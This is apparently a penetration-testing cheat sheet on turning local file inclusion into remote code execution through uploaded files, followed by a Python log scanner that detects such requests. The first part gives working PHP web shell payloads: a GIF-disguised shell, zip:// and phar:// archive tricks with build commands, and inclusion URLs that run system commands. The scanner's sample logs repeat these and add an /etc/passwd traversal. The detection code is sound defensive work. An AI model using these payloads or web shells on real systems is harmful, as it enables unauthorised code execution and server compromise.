LFI and File Uploads

Functions that include a file by name, and so are candidates for local file inclusion when the name comes from user input:

| Language | Function |
|---|---|
| PHP | `include()`/`include_once()`, `require()`/`require_once()` |
| NodeJS | `res.render()` |
| Java | `import` |
| .NET | `include` |

Image upload

Crafting Malicious Image

A file that starts with the GIF magic bytes passes a naive content-type check while still carrying PHP:

```shell
$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```

Upload it through the application's image upload form:

```text
http://<SERVER_IP>:<PORT>/settings.php
```

Uploaded File Path

The page source shows where the upload was stored, which gives the path to include:

```html
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
```

```text
http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id
```

Zip Upload

Bundle the web shell into a zip archive that carries an image extension, then include the file inside it through the `zip://` wrapper (`%23` is the URL-encoded `#` separating archive and member):

```shell
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
```

```text
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
```

Phar Upload

Build a phar archive containing the shell, rename it to an image extension, and include the member through the `phar://` wrapper:

```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
```

Phar creation is blocked unless `phar.readonly` is disabled for the run:

```shell
$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

```text
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
```
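The three requests on this page (direct inclusion of an uploaded image, `zip://`, `phar://`) share a distinctive shape: a stream wrapper or an upload-directory path inside the inclusion parameter, usually alongside a `cmd` parameter. The following is an added example (not code from the page or from the application it describes) that scans Apache-style access log lines for those indicators. The log lines are constructed; the upload directory name `profile_images/` and the parameter names are taken from the page's example application and are assumptions for any other target.

```python
import re
from urllib.parse import parse_qs

# Upload directory of the page's example application (assumption for other apps).
UPLOAD_DIR = "profile_images/"
# PHP stream wrappers that turn a local file into something else at include time.
WRAPPERS = ("zip://", "phar://", "php://", "data://")

IMAGE_IN_UPLOAD_DIR = re.compile(
    r"%s[^#/]+\.(?:gif|jpe?g|png)\b" % re.escape(UPLOAD_DIR), re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (Apache combined format).
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id HTTP/1.1" 200 512 "-" "curl/7.88.1"',
    '10.10.14.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id HTTP/1.1" 200 512 "-" "curl/7.88.1"',
    '10.10.14.5 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?language=./profile_images/shell.gif&cmd=id HTTP/1.1" 200 498 "-" "curl/7.88.1"',
    '10.10.14.5 - - [10/Oct/2023:13:58:41 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 1803 "-" "curl/7.88.1"',
    '10.10.14.9 - - [10/Oct/2023:14:01:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [10/Oct/2023:14:01:01 +0000] "GET /profile_images/avatar.gif HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def indicators_for_request(target: str) -> list:
    """Return sorted indicator tags for one request target (path plus query string)."""
    query = target.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)   # percent-decodes values once
    found = set()
    for values in params.values():
        for value in values:
            lowered = value.lower()
            for wrapper in WRAPPERS:
                if lowered.startswith(wrapper):
                    found.add("wrapper:" + wrapper[:-3])
            if "../" in lowered or "..\\" in lowered:
                found.add("traversal")
            if IMAGE_IN_UPLOAD_DIR.search(value):
                found.add("upload-path-in-param")
    # A cmd parameter is only interesting next to another indicator; alone it is noise.
    if found and "cmd" in params:
        found.add("cmd-param")
    return sorted(found)


def scan_log(lines) -> list:
    """Return [(line_number, indicators)] for every line that shows at least one indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        indicators = indicators_for_request(match.group("target"))
        if indicators:
            hits.append((number, indicators))
    return hits


if __name__ == "__main__":
    for number, indicators in scan_log(SAMPLE_LOG):
        print(number, ", ".join(indicators))
```

`parse_qs` decodes one layer of percent-encoding, so `%23` and `%2F` become `#` and `/` before matching; double-encoded values would need a second `unquote` pass. Matching on decoded values is deliberate: the wrapper prefix and the upload directory are what matter, not the exact encoding the client chose.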